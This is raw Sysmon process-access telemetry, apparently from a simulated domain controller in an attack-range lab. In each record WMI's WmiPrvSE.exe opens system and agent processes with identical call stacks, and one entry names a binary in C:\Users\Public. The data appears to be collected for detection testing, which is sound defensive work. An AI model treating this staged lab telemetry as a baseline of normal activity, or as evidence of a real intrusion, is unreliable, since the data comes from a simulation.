16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 